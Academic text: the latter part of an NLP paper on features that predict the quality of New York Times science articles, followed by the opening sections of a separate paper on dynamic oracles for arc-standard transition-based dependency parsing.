on all visual words and the other on visual topics. We consider only the adjectives, adverbs, verbs and common nouns in an article as candidate words for computing visual quality. Overall visual use: We compute the propor- tion of candidate words that match the visual word list as the TOTAL VISUAL feature. We also compute the proportions based only on the first 200 words of the article (BEG VISUAL), the last 200 words (END VISUAL) and the middle region (MID VISUAL) as features. We also divide the arti- cle into five equally sized bins of words where each bin captures consecutive words in the article. Within each bin we compute the proportion of visual words. We treat these values as a probability distribution and compute its entropy (ENTROPY VISUAL). We expected these position features to indicate how the placement of visual words is related to quality. Topic-based features: We also compute what pro- portion of the words we identify as visual matches the list under each topic. The maximum proportion from a single topic (MAX TOPIC VISUAL) is a fea- ture. We also compute a greedy cover set of top- ics for the visual words in the article. The topic that matches the most visual words is added first, and the next topic is selected based on the remain- ing unmatched words. The number of topics needed to cover 50% of the article’s visual words is the TOPIC COVER VISUAL feature. These features cap- ture the mix of visual words from different topics. Disregarding topic information, we also compute a feature NUM PICTURES which is the number of im- ages in the corpus where 40% of the image’s tags are matched in the article. We found 8 features to vary significantly be- tween the two types of articles. The fea- tures with significantly higher values in VERY GOOD articles are: BEG VISUAL, END VISUAL, MAX TOPIC VISUAL. The features with signifi- cantly higher values in the TYPICAL articles are: TOTAL VISUAL, MID VISUAL, ENTROPY VISUAL, TOPIC COVER VISUAL, NUM PICTURES. It appears that the simple expectation that VERY GOOD articles contain more visual words overall does not hold true here. However the great writ- ing samples have a higher degree of visual content in the beginning and ends of articles. Good articles also have lower entropy for the distribution of vi- sual words indicating that they appear in localized positions in contrast to being distributed throughout. The topic-based features further indicate that for the VERY GOOD articles, the visual words come from only a few topics (compared to TYPICAL articles) and so may evoke a coherent image or scene. 3.2 The use of people in the story We hypothesized that articles containing research findings that directly affect people in some way, and therefore involve explicit references to people in the story, will make a bigger impact on the reader. For example, the most frequent topic among our VERY GOOD samples is ‘medicine and health’ where ar- ticles are often written from the view of a patient, doctor or scientist. An example is below. Dr. Remington was born in Reedville, Va., in 1922, to Maud and P. Sheldon Remington, a school headmaster. Charles spent his boyhood chasing butterflies alongside his father, also a col- lector. During his graduate studies at Harvard, he founded the Lepidopterists’ Society with an equally butterfly-smitten under- graduate, Harry Clench. We approximate this facet by computing the num- ber of explicit references to people, relying on three sources of information about animacy of words. The first is named entity (NE) tags (PERSON, ORGANI- ZATION and LOCATION) returned by the Stanford NE recognition tool (Finkel et al., 2005). We also created a list of personal pronouns such as ‘he’, ‘my- self’ etc. which standardly indicate animate entities (animate pronouns). Our third resource contains the number of times different noun phrases (NP) were followed by each of the relative pronouns ‘who’, ‘where’ and ‘which’. 345 These counts for 664,673 noun phrases were col- lected by Ji and Lin (2009) from the Google Ngram Corpus (Lin et al., 2010). We use a simple heuris- tic to obtain a list of animate (google animate) and inanimate nouns (google inanimate) from this list. The head of each NP is taken as a candidate noun. If the noun does not occur with ‘who’ in any of the noun phrases where it is the head, then it is inani- mate. In contrast, if it appears only with ‘who’ in all noun phrases, it is animate. Otherwise, for each NP where the noun is a head, we check whether the count of times the noun phrase appeared with ‘who’ is greater than each of the occurrences of ‘which’, ‘where’ and ‘when’ (taken individually) with that noun phrase. If the condition holds for at least one noun phrase, the noun is marked as animate. When computing the features for an article, we consider all nouns and pronouns as candidate words. If the word is a pronoun and appears in our list of an- imate pronouns, it is assigned an ‘animate’ label and ‘inanimate’ otherwise. If the word is a proper noun and tagged with the PERSON NE tag, we mark it as ‘animate’ and if it is a ORGANIZATION or LO- CATION tag, the word is ‘inanimate’. For common nouns, we check it if appears in the google animate and inanimate lists. Any match is labelled accord- ingly as ‘animate’ and ‘inanimate’. Note that this procedure may leave some nouns without any labels. Our features are counts of animate tokens (ANIM), inanimate tokens (INAMIN) and both these counts normalized by total words in the article (ANIM PROP, INANIM PROP). Three of these fea- tures had significantly higher mean values in the TYPICAL category of articles: ANIM, ANIM PROP, INANIM PROP. We found upon observation that sev- eral articles that talk about government policies in- volve a lot of references to people but are often in the TYPICAL category. These findings suggest that the ‘human’ dimension might need to be computed not only based on simple counts of references to people but also involve finer distinctions between them. 3.3 Beautiful language Beautiful phrasing and word choice can entertain the reader and leave a positive impression. Multi- ple studies in the education genre (Diederich, 1974; Spandel, 2004) note that when teachers and expert adult readers graded student writing, word choice and phrasing always turn out as a significant factors influencing the raters’ scores. We implement a method for detecting creative language based on a simple idea that creative words and phrases are sometimes those that are used in un- usual contexts and combinations or those that sound unusual. We compute measures of unusual language both at the level of individual words and for the com- bination of words in a syntactic relation. Word level measures: Unusual words in an ar- ticle are likely to be those with low frequencies in a background corpus. We use the full set of articles (not only science) from year 1996 in the NYT corpus as a background (these do not over- lap with our corpus for article quality). We also ex- plore patterns of letters and phoneme sequences with the idea that unusual combination of characters and phonemes could create interesting words. We used the CMU pronunciation dictionary (Weide, 1998) to get the phoneme information for words and built a 4- gram model of phonemes on the background corpus. Laplace smoothing is used to compute probabilities from the model. However, the CMU dictionary does not contain phoneme information for several words in our corpus. So we also compute an approximate model using the letters in the words and obtain an- other 4-gram model.4 Only words that are longer than 4 characters are used in both models and we fil- ter out proper names, named entities and numbers. During development, we analyzed the articles from an entire year of NYT, 1997, with the three models to identify unusual words. Below is the list of words with lowest frequency and those with high- est perplexity under the phoneme and letter models. Low frequency. undersheriff, woggle, ahmok, hofman, volga, oceanaut, trachoma, baneful, truffler, acrimal, corvair, entomopter High perplexity-phoneme model. showroom, yahoo, dossier, powwow, plowshare, oomph, chihuahua, iono- sphere, boudoir, superb, zaire, oeuvre High perplexity-letter model. kudzu, muumuu, qi- pao, yugoslav, kohlrabi, iraqi, yaqui, yakuza, jujitsu, oeu- vre, yaohan, kaffiyeh For computing the features, we consider only nouns, verbs, adjectives and adverbs. We also require that the words are at least 5 letters long 4We found that higher order n-grams provided better pre- dictions of unusual nature during development. 346 and do not contain a hyphen5. Three types of scores are computed. FREQ NYT is the aver- age of word frequencies computed from the back- ground corpus. The second set of features are based on the phoneme model. We compute the average perplexity of words under the model, AVR PHONEME PERP ALL. In addition, we also or- der the words in an article based on decreasing per- plexity values and the average perplexity of the top 10, 20 and 30 words in this list are added as fea- tures (AVR PHONEME PERP 10, 20, 30). We ob- tain similar features from the letter n-gram model (AVR CHAR PERP ALL, AVR CHAR PERP 10, 20, 30). In phoneme features, we ignore words that do not have an entry in the CMU dictionary. Word pair measures: Next we attempt to detect un- usual combinations of words. We do this calculation only for certain types of syntactic relations–a) nouns and their adjective modifiers, b) verbs with adverb modifiers, c) adjacent nouns in a noun phrase and d) verb and subject pairs. Counts for co-occurrence again come from NYT 1996 articles. The syntactic relations are obtained using the constituency and de- pendency parses from the Stanford parser (Klein and Manning, 2003; De Marneffe et al., 2006). To avoid the influence of proper names and named entities, we replace them with tags (NNP for proper names and PERSON, ORG, LOC for named entities). We treat the words for which the dependency holds as a (auxiliary word, main word) pair. For adjective-noun and adverb-verb pairs, the auxiliary is the adjective or adverb; for noun-noun pairs, it is the first noun; and for verb-subject pairs, the auxil- iary is the subject. Our idea is to compute usualness scores based on frequency with which a particular pair of words appears in the background. Specifically, we compute the conditional proba- bility of the auxiliary word given the main word as the score for likelihood of observing the pair. We consider the main word as related to the article topic, so we use the conditional probability of auxil- iary given main word and not the other way around. However, the conditional probability has no infor- mation about the frequency of the auxiliary word. So we apply ideas from interpolation smoothing (Chen 5We noticed that in this genre several new words are created using hyphen to concatenate common words. ADJ-NOUN ADV-VERB hypoactive NNP suburbs said plasticky woman integral was psychogenic problems collective do yoplait television physiologically do subminimal level amuck run ehatchery investment illegitimately put NOUN-NOUN SUBJ-VERB specification today blog said auditory system briefer said pal programs hr said steganography programs knucklehead said wastewater system lymphedema have autism conference permissions have Table 1: Unusual word-pairs from different categories and Goodman, 1996) and compute the conditional probability as a interpolated quantity together with the unigram probability of the auxiliary word. p̂(aux|main) = λ∗p(aux|main)+(1−λ)∗p(aux) The unigram and conditional probabilities are also smoothed using Laplace method. We train the lambda values to optimize data likelihood using the Baum Welch algorithm and use the pairs from NYT 1997 year articles as a development set. The lambda values across all types of pairs tended to be lower than 0.5 giving higher weight to the unigram proba- bility of the auxiliary word. Based on our observations on the development set, we picked a cutoff of 0.0001 on the proba- bility (0.001 for adverb-verb pairs) and consider phrases with probability below this value as un- usual. For each test article, we compute the num- ber of unusual phrases (total for all categories) as a feature (SURP) and also this value normal- ized by total number of word tokens in the article (SURP WD) and normalized by number of phrases (SURP PH). We also compute features for indi- vidual pair types and in each case, the number of unusual phrases is normalized by the total words in the article (SURP ADJ NOUN, SURP ADV VERB, SURP NOUN NOUN, SURP SUBJ VERB). A list of the top unusual words under the different pair types are shown in Table 1. These were com- puted on pairs from a random set of articles from our corpus. Several of the top pairs involve hyphenated words which are unusual by themselves, so we only show in the table the top words without hyphens. 347 Most of these features are significantly different between the two classes. Those with higher values in the VERY GOOD set include: AVR PHONEME PERP ALL, AVR CHAR PERP (ALL, 10), SURP, SURP PH, SURP WD, SURP ADJ NOUN, SURP NOUN NOUN, SURP SUBJ VERB. The FREQ NYT feature has higher value in the TYPICAL class. All these trends indicate that unusual phrases are associated with the VERY GOOD category of articles. 3.4 Sub-genres There are several sub-genres within science writing (Stocking, 2010): short descriptions of discoveries, longer explanatory articles, narratives, stories about scientists, reports on meetings, review articles and blog posts. Naturally, some of these sub-genres will be more appealing to readers. To investigate this aspect, we compute scores for some sub-genres of interest—narrative, attribution and interview. Narrative texts typically have characters and events (Nakhimovsky, 1988), so we look for entities and past tense in the articles. We count the number of sentences where the first verb in surface order is in the past tense. Then among these sentences, we pick those which have either a personal pronoun or a proper noun before the target verb (again in surface order). The proportion of such sentences in the text is taken as the NARRATIVE score. We also developed a measure to identify the de- gree to which the article’s content is attributed to ex- ternal sources as opposed to the author’s own state- ments. Attribution to other sources is frequent in the news domain since many comments and opin- ions are not the views of the journalist (Semetko and Valkenburg, 2000). For science news, attribution be- comes more important since the research findings were obtained by scientists and reported in a second- hand manner by the journalists. The ATTRIB score is the proportion of sentences in the article that have a quote symbol, or the words ‘said’ and ‘says’. We also compute a score to indicate if the article is the account of an interview. There are easy clues in NYT for this genre with paragraphs in the inter- view portion of the article beginning with either ‘Q.’ (question) or ‘A.’ (answer). We count the total num- ber of ‘Q.’ and ‘A.’ prefixes combined and divide the value by the total number of sentences (INTER- VIEW). When either the number of ‘Q.’ tags is zero or ‘A.’ tags is zero, the score is set to zero. All three scores are significantly higher for the TYPICAL class. 3.5 Affective content Some articles, for example those detailing research on health, crime, ethics, can provoke emotional re- actions in readers as shown in the snippet below. Medicine is a constant trade-off, a struggle to cure the dis- ease without killing the patient first. Chemotherapy, for exam- ple, involves purposely poisoning someone – but with the ex- pectation that the short-term injury will be outweighed by the eventual benefits. We compute affect-related features using three lexicons. The MPQA (Wilson et al., 2005) and Gen- eral Inquirer (Stone et al., 1966) give lists of positive and negative sentiment words. The third resource is emotion-related words from FrameNet (Baker et al., 1998). The sizes of these lexicon are 8,221, 5,395, and 653 words respectively. We compute the counts of positive, negative, polar, and emotion words, each normalized by the total number of con- tent words in the article (POS PROP, NEG PROP, PO- LAR PROP, EMOT PROP). We also include the pro- portion of emotion and polar words taken together (POLAR EMOT PROP) and the ratio between count of positive and negative words (POS BY NEG). The features with higher values in the VERY GOOD class are NEG PROP, POLAR PROP, EMOT POLAR PROP. In TYPICAL articles, POS BY NEG, EMOT PROP have higher values. VERY GOOD articles have more sentiment words, mostly skewed towards negative sentiment. 3.6 Amount of research content For a lay audience, a science writer presents only the most relevant findings and methods from a research study and interleaves research information with de- tails about the relevance of the finding, people in- volved in the research and general information about the topic. As a result, the degree of explicit research descriptions in the articles varies considerably. To test how this aspect is associated with qual- ity, we count references to research methods and re- searchers in the article. We use the research dictio- nary that we introduced in Section 2 as the source of research-related words. We count the total num- 348 ber of words in the article that match the dictionary (RES TOTAL) and also the number of unique match- ing words (RES UNIQ). We also normalize these counts by the total words in the article and create features RES TOTAL PROP and RES UNIQ PROP. All four features have significantly higher values in the VERY GOOD articles which indicate that great articles are also associated with a great amount of direct research content and explanations. 4 Classification accuracy We trained classifiers using all the above features for for the two settings–‘any-topic’ and ‘same-topic’ in- troduced in Section 2.3. The baseline random accu- racy in both cases is 50%. We use a SVM classi- fier with a radial basis kernel (R Development Core Team, 2011) and parameters were tuned using cross validation on the development data. The best parameters were then used to classify the test set in a 10 fold cross-validation setting. We di- vide the test set into 10 parts, train on 9 parts and test on the held-out data. The average accuracies in the 10 experiments are 75.3% accuracy for the ‘any- topic’ setup, and 68% accuracy for the topic-paired ‘same-topic’ setup. These accuracies are consider- able improvements over the baseline. The ‘same-topic’ data contains article pairs with varying similarity. So we investigate the relationship between topic similarity and accuracy of prediction more closely for this setting. We divide the article pairs into bins based on the similarity value. We compute the 10-fold cross validation predictions us- ing the different feature classes above and collect the predicted values across all the folds. Then we com- pute accuracy of examples within each bin. These results are plotted in Figure 1. int-science refers to the full set of features and the results from the six feature classes are also indicated. As the similarity increases, the prediction task be- comes harder. The combination of all features gives 66% accuracy for pairs above 0.4 similarity and 74% when the similarity is less than 0.15. Most individ- ual feature classes also show a similar trend. This result is understandable because articles on simi- lar topics could exhibit similar properties. For ex- ample, two articles about ‘controversies surround- ing vaccination’ are likely to have similar levels of people-oriented nature or written in a narrative style Figure 1: Accuracy on pairs with different similarity in the same way as two space-related articles are both likely to contain high visual content. There are however two exceptions—affect and research. For these features, the accuracies improve with higher similarity; affect features give 51% for pairs with similarity 0.1 and 62% for pairs above 0.4 similar- ity, accuracy of research features goes from 52% to 57% for the same similarity values. This finding il- lustrates that even articles on very similar topics can be written differently, with the articles by the excel- lent authors associated with greater degree of senti- ment, and deeper study of the research problem. 5 Combining aspects of article quality We now compare and combine the genre-specific interest-science features (41 total) with those dis- cussed in work on readability, well-written nature, interest and topic classification. Readability (16 features): We test the full set of readability features studied in Pitler and Nenkova (2008), involving token-type ratio, word and sen- tence length, language model features, cohesion scores and syntactic estimates of complexity. Well-written nature (23 features): For well- written nature, we use two classes of features, both related to discourse. One is the probabilities of dif- ferent types of entity transitions from the Entity Grid model (Barzilay and Lapata, 2008) which we com- pute with the Brown Coherence Toolkit (Elsner et al., 2007). The other class of features are those de- fined in Pitler and Nenkova (2008) for likelihoods and counts of explicit discourse relations. We iden- tified the relations for texts in our corpus using the 349 AddDiscourse tool (Pitler and Nenkova, 2009). Interesting fiction (22 features): are those intro- duced by McIntyre and Lapata (2009) for predicting interest ratings on fairy tales. They include counts of syntactic items and relations, and token categories from the MRC psycholinguistic database. We nor- malize each feature by the total words in the article. Content: features are based on the words present in the articles. Word features are standard in content-based recommendation systems (Pazzani et al., 1996; Mooney and Roy, 2000) where they are used to pick out articles similar to those which a user has already read. In our work the features are the most frequent n words in our corpus after removing the 50 most frequent ones. The word’s count in the article is the feature value. Note that word features indicate topic as well as other content in the article such as sentiment and research. A random sample of the word features for n = 1000 is shown below and reflects this aspect. “matter, series, wear, nation, ac- count, surgery, high, receive, remember, support, worry, enough, office, prevent, biggest, customer”. Table 2 compares the accuracies of SVM classi- fiers trained on features from different classes and their combinations.6 The readability, well-written nature and interesting fiction classes provide good accuracies 60% and above. The genre-specific interesting-science features are individually much stronger than these classes. Different writing as- pects (without content) are clearly complementary and when combined give 76% to 79% accuracy for the ‘any-topic’ task and 74% for the topic pairs task. The simple bag of words features work remark- ably well giving 80% accuracy in both settings. As mentioned before these word features are a mix of topic indicators as well as other content of the ar- ticles, ie., they also implicitly indicate animacy, re- search or sentiment. But the high accuracy of word features above all the writing categories indicates that topic plays an important role in article quality. However, despite the high accuracy, word features are not easily interpretable in different classes re- lated to writing as we have done with other writing features. Further, the total set of writing features is 6For classifiers involving content features, we did not tune the SVM parameters because of the small size of development data compared to number of features. Default SVM settings were used instead. Feature set Any Topic Same Interesting-science 75.3 68.0 Readable 65.5 63.0 Well-written 59.1 59.9 Interesting-fiction 67.9 62.8 Readable + well-writ 64.7 64.3 Readable + well-writ + Int-fict 71.0 70.3 Readable + well-writ + Int-sci 79.5 73.2 All writing aspects 76.7 74.7 Content (500 words) 81.7 79.4 Content (1000 words) 81.2 82.1 Combination: Writing (all) + Content (1000w) In feature vector 82.6* 84.0* Sum of confidence scores 81.6 84.9 Oracle 87.6 93.8 Table 2: Accuracy of different article quality aspects only 102 in contrast to 1000 word features. In our interest-science feature set, we aimed to highlight how well some of the aspects considered important to good science writing can predict quality ratings. We also combined writing and word features to mix topic with writing related predictors. We do the combination in three ways a) word and writing fea- tures are included together in the feature vector; b) two separate classifiers are trained (one using word features and the other using writing ones) and the sum of confidence measures is used to decide on the final class; c) an oracle method: two classifiers are trained just as in option (b) but when they disagree on the class, we pick the correct label. The oracle method gives a simple upper bound on the accuracy obtainable by combination. These values are 87% for ‘any-topic’ and a higher 93.8% for ‘same-topic’. The automatic methods, both feature vector combi- nation and classifier combination also give better ac- curacies than only the word or writing features. The accuracies for the folds from 10 fold cross valida- tion in the feature vector combination method were also found to be significantly higher than those from word features only (using a paired Wilcoxon signed- rank test). Therefore both topic and writing features are clearly useful for identifying great articles. 6 Conclusion Our work is a step towards measuring overall arti- cle quality by showing the complementary benefits of general and domain-specific writing measures as well as indicators of article topic. In future we plan to focus on development of more features as well as better methods for combining different measures. 350 References C. F. Baker, C. J. Fillmore, and J. B. Lowe. 1998. The berkeley framenet project. In Proceedings of COLING-ACL, pages 86–90. Z. Bao, B. Kimelfeld, and Y. Li. 2011. A graph ap- proach to spelling correction in domain-centric search. In Proceedings of ACL-HLT, pages 905–914. R. Barzilay and M. Lapata. 2008. Modeling local coher- ence: An entity-based approach. Computational Lin- guistics, 34(1):1–34. R. Barzilay, N. Elhadad, and K. McKeown. 2002. Inferring strategies for sentence ordering in multi- document summar ization. Journal of Artificial Intel- ligence Research, 17:35–55. D.M. Blei, A.Y. Ng, and M.I. Jordan. 2003. Latent dirichlet allocation. the Journal of machine Learning research, 3:993–1022. D. Blum, M. Knudson, and R. M. Henig, editors. 2006. A field guide for science writers: the official guide of the national association of science writers. Oxford University Press, New York. E. Brill and R.C. Moore. 2000. An improved error model for noisy channel spelling correction. In Proceedings of ACL, pages 286–293. S. F. Chen and J. Goodman. 1996. An empirical study of smoothing techniques for language modeling. In Proceedings of ACL, pages 310–318. S. Cucerzan and E. Brill. 2004. Spelling correction as an iterative process that exploits the collective knowledge of web users. In Proceedings of EMNLP, pages 293– 300. R. Dale and A. Kilgarriff. 2010. Helping our own: text massaging for computational linguistics as a new shared task. In Proceedings of INLG, pages 263–267. M. C. De Marneffe, B. MacCartney, and C. D. Man- ning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of LREC, vol- ume 6, pages 449–454. P. Diederich. 1974. Measuring Growth in English. Na- tional Council of Teachers of English. M. Elsner, J. Austerweil, and E. Charniak. 2007. A uni- fied local and global model for discourse coherence. In Proceedings of NAACL-HLT, pages 436–443. J. R. Finkel, T. Grenager, and C. Manning. 2005. In- corporating non-local information into information ex- traction systems by gibbs sampling. In Proceedings of ACL, pages 363–370. R. Flesch. 1948. A new readability yardstick. Journal of Applied Psychology, 32:221 – 233. A.C. Graesser, D.S. McNamara, M.M. Louwerse, and Z. Cai. 2004. Coh-Metrix: Analysis of text on co- hesion and language. Behavior Research Methods In- struments and Computers, 36(2):193–202. H. Ji and D. Lin. 2009. Gender and animacy knowledge discovery from web-scale n-grams for unsupervised person name detection. In Proceedings of PACLIC. D. Klein and C.D. Manning. 2003. Accurate unlexical- ized parsing. In Proceedings of ACL, pages 423–430. S.M. Kosslyn. 1980. Image and mind. Harvard Univer- sity Press. M. Lapata. 2003. Probabilistic text structuring: Experi- ments with sentence ordering. In Proceedings of ACL, pages 545–552. C. Lin and E. Hovy. 2000. The automated acquisition of topic signatures for text summarization. In Proceed- ings of COLING, pages 495–501. D. Lin, K. W. Church, H. Ji, S. Sekine, D. Yarowsky, S. Bergsma, K. Patil, E. Pitler, R. Lathbury, V. Rao, K. Dalwani, and S. Narsale. 2010. New tools for web- scale n-grams. In Proceedings of LREC. N. McIntyre and M. Lapata. 2009. Learning to tell tales: A data-driven approach to story generation. In Pro- ceedings of ACL-IJCNLP, pages 217–225. R. J. Mooney and L. Roy. 2000. Content-based book recommending using learning for text categorization. In Proceedings of the fifth ACM conference on Digital libraries, pages 195–204. A. Nakhimovsky. 1988. Aspect, aspectual class, and the temporal structure of narrative. Computational Lin- guistics, 14(2):29–43, June. M. Pazzani, J. Muramatsu, and D. Billsus. 1996. Syskill & Webert: Identifying interesting web sites. In Pro- ceedings of AAAI, pages 54–61. E. Pitler and A. Nenkova. 2008. Revisiting readabil- ity: A unified framework for predicting text quality. In Proceedings of EMNLP, pages 186–195. E. Pitler and A. Nenkova. 2009. Using syntax to dis- ambiguate explicit discourse connectives in text. In Proceedings of ACL-IJCNLP, pages 13–16. R Development Core Team, 2011. R: A Language and Environment for Statistical Computing. R Foundation for Statistical Computing. D. Ramage, D. Hall, R. Nallapati, and C.D. Manning. 2009. Labeled lda: A supervised topic model for credit attribution in multi-labeled corpora. In Proceed- ings of EMNLP, pages 248–256. A. Rozovskaya and D. Roth. 2010. Generating confu- sion sets for context-sensitive error correction. In Pro- ceedings of EMNLP, pages 961–970. E. Sandhaus. 2008. The new york times annotated cor- pus. Corpus number LDC2008T19, Linguistic Data Consortium, Philadelphia. S. Schwarm and M. Ostendorf. 2005. Reading level as- sessment using support vector machines and statistical language models. In Proceedings of ACL, pages 523– 530. 351 H.A. Semetko and P.M. Valkenburg. 2000. Framing eu- ropean politics: A content analysis of press and televi- sion news. Journal of communication, 50(2):93–109. V. Spandel. 2004. Creating Writers Through 6-Trait Writing: Assessment and Instruction. Allyn and Ba- con, Inc. S. H. Stocking. 2010. The New York Times Reader: Sci- ence and Technology. CQ Press, Washington DC. P. J. Stone, J. Kirsh, and Cambridge Computer Asso- ciates. 1966. The General Inquirer: A Computer Ap- proach to Content Analysis. MIT Press. J. R. Tetreault and M. Chodorow. 2008. The ups and downs of preposition error detection in esl writing. In Proceedings of COLING, pages 865–872. L. von Ahn and L. Dabbish. 2004. Labeling images with a computer game. In Proceedings of CHI, pages 319– 326. R. L. Weide. 1998. The cmu pronunciation dictio- nary, release 0.6. http://www.speech.cs.cmu.edu/cgi- bin/cmudict. T. Wilson, J. Wiebe, and P. Hoffmann. 2005. Recogniz- ing contextual polarity in phrase-level sentiment anal- ysis. In Proceedings of HLT-EMNLP, pages 347–354. M. Wilson. 1988. MRC psycholinguistic database: Machine-usable dictionary, version 2.00. Behavior Research Methods, 20(1):6–10. 352 work_hebrzn33h5bmnl4jpzofb5owoe ---- A Tabular Method for Dynamic Oracles in Transition-Based Parsing Yoav Goldberg Department of Computer Science Bar Ilan University, Israel yoav.goldberg@gmail.com Francesco Sartorio Department of Information Engineering University of Padua, Italy sartorio@dei.unipd.it Giorgio Satta Department of Information Engineering University of Padua, Italy satta@dei.unipd.it Abstract We develop parsing oracles for two trans- ition-based dependency parsers, including the arc-standard parser, solving a problem that was left open in (Goldberg and Nivre, 2013). We experimentally show that using these or- acles during training yields superior parsing accuracies on many languages. 1 Introduction Greedy transition-based dependency parsers (Nivre, 2008) incrementally process an input sentence from left to right. These parsers are very fast and provide competitive parsing accuracies (Nivre et al., 2007). However, greedy transition-based parsers still fall behind search-based parsers (Zhang and Clark, 2008; Huang and Sagae, 2010) with respect to accuracy. The training of transition-based parsers relies on a component called the parsing oracle, which maps parser configurations to optimal transitions with re- spect to a gold tree. A discriminative model is then trained to simulate the oracle’s behavior. A parsing oracle is deterministic if it returns a single canon- ical transition. Furthermore, an oracle is partial if it is defined only for configurations that can reach the gold tree, that is, configurations representing pars- ing histories with no mistake. Oracles that are both deterministic and partial are called static. Tradition- ally, only static oracles have been exploited in train- ing of transition-based parsers. Recently, Goldberg and Nivre (2012; 2013) showed that the accuracy of greedy parsers can be substantially improved without affecting their pars- ing speed. This improvement relies on the intro- duction of novel oracles that are nondeterministic and complete. An oracle is nondeterministic if it re- turns the set of all transitions that are optimal with respect to the gold tree, and it is complete if it is well-defined and correct for every configuration that is reachable by the parser. Oracles that are both non- deterministic and complete are called dynamic. Goldberg and Nivre (2013) develop dynamic or- acles for several transition-based parsers. The con- struction of these oracles is based on a property of transition-based parsers that they call arc decompos- ition. They also prove that the popular arc-standard system (Nivre, 2004) is not arc-decomposable, and they leave as an open research question the construc- tion of a dynamic oracle for the arc-standard system. In this article, we develop one such oracle (§4) and prove its correctness (§5). An extension to the arc-standard parser was presented by Sartorio et al. (2013), which relaxes the bottom-up construction order and allows mixing of bottom-up and top-down strategies. This parser, called here the LR-spine parser, achieves state-of- the-art results for greedy parsing. Like the arc-stand- ard system, the LR-spine parser is not arc-decom- posable, and a dynamic oracle for this system was not known. We extend our oracle for the arc-stand- ard system to work for the LR-spine system as well (§6). The dynamic oracles developed by Goldberg and Nivre (2013) for arc-decomposable systems are based on local properties of computations. In con- trast, our novel dynamic oracle algorithms rely on arguably more complex structural properties of com- putations, which are computed through dynamic programming. This leaves open the question of whether a machine-learning model can learn to ef- fectively simulate such complex processes: will the 119 Transactions of the Association for Computational Linguistics, 2 (2014) 119–130. Action Editor: Ryan McDonald. Submitted 11/2013; Revised 2/2014; Published 4/2014. c©2014 Association for Computational Linguistics. benefit of training with the dynamic oracle carry over to the arc-standard and LR-spine systems? We show experimentally that this is indeed the case (§8), and that using the training-with-exploration method of (Goldberg and Nivre, 2013) with our dynamic programming based oracles yields superior parsing accuracies on many languages. 2 Arc-Standard Parser In this section we introduce the arc-standard parser of Nivre (2004), which is the model that we use in this article. To keep the notation at a simple level, we only discuss the unlabeled version of the parser; however, a labeled extension is used in §8 for our experiments. 2.1 Preliminaries and Notation The set of non-negative integers is denoted as N0. For i,j ∈ N0 with i ≤ j, we write [i,j] to denote the set {i, i + 1, . . . ,j}. When i > j, [i,j] denotes the empty set. We represent an input sentence as a string w = w0 · · ·wn, n ∈ N0, where token w0 is a special root symbol, and each wi with i ∈ [1,n] is a lex- ical token. For i,j ∈ [0,n] with i ≤ j, we write w[i,j] to denote the substring wiwi+1 · · ·wj of w. We write i → j to denote a grammatical de- pendency of some unspecified type between lexical tokens wi and wj, where wi is the head and wj is the dependent. A dependency tree for w is a directed, ordered tree t = (Vw,A), such that Vw = [0,n] is the set of nodes, A ⊆ Vw×Vw is the set of arcs, and node 0 is the root. Arc (i,j) encodes a dependency i → j, and we will often use the latter notation to denote arcs. 2.2 Transition-Based Dependency Parsing We assume the reader is familiar with the formal framework of transition-based dependency parsing originally introduced by Nivre (2003); see Nivre (2008) for an introduction. We only summarize here our notation. Transition-based dependency parsers use a stack data structure, where each stack element is associ- ated with a tree spanning (generating) some sub- string of the input w. The parser processes the in- put string incrementally, from left to right, applying at each step a transition that updates the stack and/or consumes one token from the input. Transitions may also construct new dependencies, which are added to the current configuration of the parser. We represent the stack data structure as an ordered sequence σ = [σd, . . . ,σ1], d ∈ N0, of nodes σi ∈ Vw, with the topmost element placed at the right. When d = 0, we have the empty stack σ = []. Sometimes we use the vertical bar to denote the append operator for σ, and write σ = σ′|σ1 to indicate that σ1 is the topmost element of σ. The parser also uses a buffer to store the portion of the input string still to be processed. We represent the buffer as an ordered sequence β = [i, . . . ,n] of nodes from Vw, with i the first element of the buf- fer. In this way β always encodes a (non-necessarily proper) suffix of w. We denote the empty buffer as β = []. Sometimes we use the vertical bar to denote the append operator for β, and write β = i|β′ to in- dicate that i is the first token of β; consequently, we have β′ = [i + 1, . . . ,n]. When processing w, the parser reaches several states, technically called configurations. A config- uration of the parser relative to w is a triple c = (σ,β,A), where σ and β are a stack and a buffer, respectively, and A ⊆ Vw ×Vw is a set of arcs. The initial configuration for w is ([], [0, . . . ,n],∅). For the purpose of this article, a configuration is final if it has the form ([0], [],A), and in a final config- uration arc set A always defines a dependency tree for w. The core of a transition-based parser is the set of its transitions, which are specific to each family of parsers. A transition is a binary relation defined over the set of configurations of the parser. We use symbol ` to denote the union of all transition rela- tions of a parser. A computation of the parser on w is a sequence c0, . . . ,cm, m ∈ N0, of configurations (defined rel- ative to w) such that ci−1 ` ci for each i ∈ [1,m]. We also use the reflexive and transitive closure rela- tion `∗ to represent computations. A computation is called complete whenever c0 is initial and cm is fi- nal. In this way, a complete computation is uniquely associated with a dependency tree for w. 2.3 Arc-Standard Parser The arc-standard model uses the three types of trans- itions formally specified in Figure 1 120 (σ,i|β,A) `sh (σ|i,β,A) (σ|i|j,β,A) `la (σ|j,β,A∪{j → i}) (σ|i|j,β,A) `ra (σ|i,β,A∪{i → j}) Figure 1: Transitions in the arc-standard model. • Shift (sh) removes the first node in the buffer and pushes it into the stack; • Left-Arc (la) creates a new arc with the topmost node on the stack as the head and the second- topmost node as the dependent, and removes the second-topmost node from the stack; • Right-Arc (ra) is symmetric to la in that it cre- ates an arc with the second-topmost node as the head and the topmost node as the dependent, and removes the topmost node. Notation We sometimes use the functional nota- tion for a transition τ ∈ {sh, la,ra}, and write τ(c) = c′ in place of c `τ c′. Naturally, sh applies only when the buffer is not empty, and la,ra require two elements on the stack. We denote by valid(c) the set of valid transitions in a given configuration. 2.4 Arc Decomposition Goldberg and Nivre (2013) show how to derive dy- namic oracles for any transition-based parser which has the arc decomposition property, defined below. They also show that the arc-standard parser is not arc-decomposable. For a configuration c, we write Ac to denote the associated set of arcs. A transition-based parser is arc-decomposable if, for every configuration c and for every set of arcs A that can be extended to a pro- jective tree, we have ∀(i → j) ∈ A,∃c′[c `∗ c′ ∧ (i → j) ∈ Ac′ ] ⇒∃c′′[c `∗ c′′ ∧A ⊆ Ac′′ ] . In words, if each arc in A is individually derivable from c, then the set A in its entirety can be derived from c as well. The arc decomposition property is useful for deriving dynamic oracles because it is relatively easy to investigate derivability for single arcs and then, using this property, draw conclusions about the number of gold-arcs that are simultan- eously derivable from the given configuration. Unfortunately, the arc-standard parser is not arc- 